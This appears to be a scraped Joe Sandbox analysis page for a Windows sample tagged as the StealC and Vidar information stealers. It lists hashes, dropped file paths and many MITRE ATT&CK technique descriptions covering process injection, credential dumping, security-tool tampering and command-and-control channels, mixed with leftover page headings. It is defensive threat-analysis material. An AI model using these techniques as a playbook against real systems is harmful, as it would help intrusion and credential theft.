Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: SystemTimelstrcpy
String ID: #F@$#F@
API String ID: 62757014-661595268
Opcode ID: 3a859b8b0cbacdc11ebfb3e047a024e7a283962ea90257fbacdd3e9563b3f0f0
Instruction ID: 513f033f75459e748f43dcf9dcce4e772375218857ee2e068f26327ba23d5006
Opcode Fuzzy Hash: 3a859b8b0cbacdc11ebfb3e047a024e7a283962ea90257fbacdd3e9563b3f0f0
Instruction Fuzzy Hash: 8511D636D00108DFCB04EFA9D891AEE7B75EF98304F54C05EE41567251DF38AA85CBA9

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report R0hb7jyBcv.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\BGHIIJDGHCBFIECBKEGH

C:\ProgramData\CGDBFBGI

C:\ProgramData\EGHJKFHJJJKJJJJKEHCB

C:\ProgramData\FIIIIJKFCAAECAKFIEHCGDHIEG

C:\ProgramData\HTAGVDFUIE.xlsx

C:\ProgramData\IJEBKKEGDBFIIEBFHIEHCBKJJK

C:\ProgramData\IJJJEBFH

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_R0hb7jyBcv.exe_a5f048da7d633f1d02755f37f56d6beff18e56d_230e433d_85a00bb9-205f-404e-b024-213515deefdd\Report.wer

Windows Analysis Report
R0hb7jyBcv.exe

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre